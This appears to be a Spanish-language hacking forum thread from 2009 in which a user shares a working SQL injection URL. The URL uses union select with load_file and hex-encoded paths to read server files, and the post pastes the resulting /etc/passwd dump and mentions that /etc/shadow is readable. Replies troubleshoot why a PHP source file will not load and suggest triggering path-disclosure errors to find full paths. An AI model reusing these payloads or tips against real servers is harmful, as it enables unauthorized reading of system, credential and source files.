elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  por que no hace load_file este archivo???
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: por que no hace load_file este archivo???  (Leído 4,520 veces)
electronik_0

Desconectado Desconectado

Mensajes: 40


Ver Perfil
por que no hace load_file este archivo???
« en: 31 Julio 2009, 19:25 pm »


Hola bro tengo una duda :xD:

hago una sentencia de sql injected y no logro leer un archivo php, pero sin envargo si puedo leer el
/etc/shadow :)


me parece estraño la sentencia es esta


http://host/sql-injected.php?id=-1+union+all+select+1,load_file(0x2f7661722f7777772f73716c2d696e6a65637465642e706870),user(),4,5,load_file(0x2f6574632f706173737764)

y el resultado :

Nombre: aki y en el source fuente no sale el php ¬¬
Clave : root@localhost
Activo: 4
tipo usuario: 5
Nombre usuario: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false saned:x:106:113::/home/saned:/bin/false pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false messagebus:x:108:117::/var/run/dbus:/bin/false polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false master:x:1000:1000:master,,,:/home/master:/bin/bash mysql:x:112:125:MySQL Server,,,:/var/lib/mysql:/bin/false sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin postgres:x:1001:1001:PostgreSQL:/opt/PostgreSQL/8.3:/bin/sh Debian-exim:x:114:128::/var/spool/exim4:/bin/false honeyd:x:115:129:Honeyd daemon,,,:/var/log/honeypot:/bin/false tomcat55:x:116:65534::/usr/share/tomcat5.5:/bin/false tomcat6:x:117:130::/usr/share/tomcat6:/bin/false

Inyeccion -----> SELECT * from bit_user WHERE bit_user_id =-1 union all select 1,load_f
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: por que no hace load_file este archivo???
« Respuesta #1 en: 1 Agosto 2009, 01:45 am »

Clave : root@localhost
jojojo......

muchas cosas podes hacer xD
no carga el archivo php ?
x ejemplo index.php ?

pones la ruta completa ??
saludios
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: por que no hace load_file este archivo???
« Respuesta #2 en: 1 Agosto 2009, 02:16 am »

talves lo carga pero como comienza con los tags de <? y termina con ?> el explorador no lo interpreta y se ve blanco, miralo en el codigo fuente y de seguro te aparecerá de color rosado  :P
En línea

electronik_0

Desconectado Desconectado

Mensajes: 40


Ver Perfil
Re: por que no hace load_file este archivo???
« Respuesta #3 en: 1 Agosto 2009, 04:24 am »

talves lo carga pero como comienza con los tags de <? y termina con ?> el explorador no lo interpreta y se ve blanco, miralo en el codigo fuente y de seguro te aparecerá de color rosado  :P

no pues tio, eso es lo que me parece raro, es capaz de cargar un archivo del sistema

pero un php no , sera alguna configuracion del servidor ¬¬
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: por que no hace load_file este archivo???
« Respuesta #4 en: 1 Agosto 2009, 05:16 am »

le pusiste solo el archivo o le diste la ruta completa?
para eso existen los path disclosures  :P
si haces que el script arroje algún error podrás ver en que ruta están los archivos del sistema web.
En línea

MagnoBalt

Desconectado Desconectado

Mensajes: 58


Los Buenos Artitas Copian, los Grandes Roban


Ver Perfil
Re: por que no hace load_file este archivo???
« Respuesta #5 en: 1 Agosto 2009, 06:23 am »

Buenas puede ser que el usuario de Mysql no tenga permiso para leer ese Path..
Me ha pasado..

Saludos!!
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Load_file en Blind SQL
Nivel Web
franco_tuv 2 2,887 Último mensaje 20 Enero 2012, 01:54 am
por franco_tuv
Entra! Ingenio para PostExplotacion en SQL Injection Load_File HELP!
Bugs y Exploits
coldalfred 0 2,791 Último mensaje 29 Abril 2012, 03:16 am
por coldalfred
Quiero saber lo que hace este archivo
Ingeniería Inversa
luis.krash2 2 5,077 Último mensaje 6 Enero 2013, 04:02 am
por 3mp3z@ndo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines